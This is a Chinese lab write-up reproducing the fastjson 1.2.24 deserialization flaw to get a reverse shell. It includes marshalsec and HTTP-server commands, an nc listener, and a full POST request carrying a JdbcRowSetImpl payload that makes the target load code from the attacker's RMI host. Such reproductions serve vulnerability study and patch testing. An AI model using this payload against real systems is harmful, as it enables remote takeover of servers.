fastjson-1.2.24反序列化
1 原理
fastjson是处理json数据,属于阿里巴巴开发
在传输数据的过程中发生了反序列化,以反弹shell为例,具体过程见复现步骤
2 复现过程
服务器:192.168.43.127
kali:192.168.43.149
(1)json页面的样子
192.168.43.127:8090
(2)json指纹,直接修改为post请求
(2)生成一个反弹shell的class类,并起一个临时http服务,接收shell的机器是192.168.43.149,监听1234端口
python3 -m http.server 1111
exploit代码图
exploit代码
执行javac Exploit.java ,生成class文件
(3)使用marshalsec-0.0.3-SNAPSHOT-all.jar起一个9999监听端口
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer “http://192.168.43.149:1111/#Exploit” 9999
(4)使用burp发送payload,并在kali上nc -lvnp 1234,接收shell
burp截图
POST / HTTP/1.1
Host: 192.168.43.198:8090
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 163
{
"b":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"rmi://192.168.43.149:9999/Exploit",
"autoCommit":true
}
}
3 易错点,不然弹不回来shell
java尽量是1.8,高版本好像无法成功
网上的文章只做参考,要有自己的判断,对于fastjson传输和处理数据的理解,很多步骤是错误的
三个文件须放在同一文件夹下(没测试是否必须这样,等待进一步测试确认),用来起一个http临时服务
payload括号要闭合,不闭合也可以
ip随便填,都能弹回来
bash反弹shell代码需要base64加密
错误示范,也不对,函数不一样,是实现的功能就不一样,具体问题具体分析,能弹回shell来的poc才是还代码,因地制宜,因时而异。
报如下错误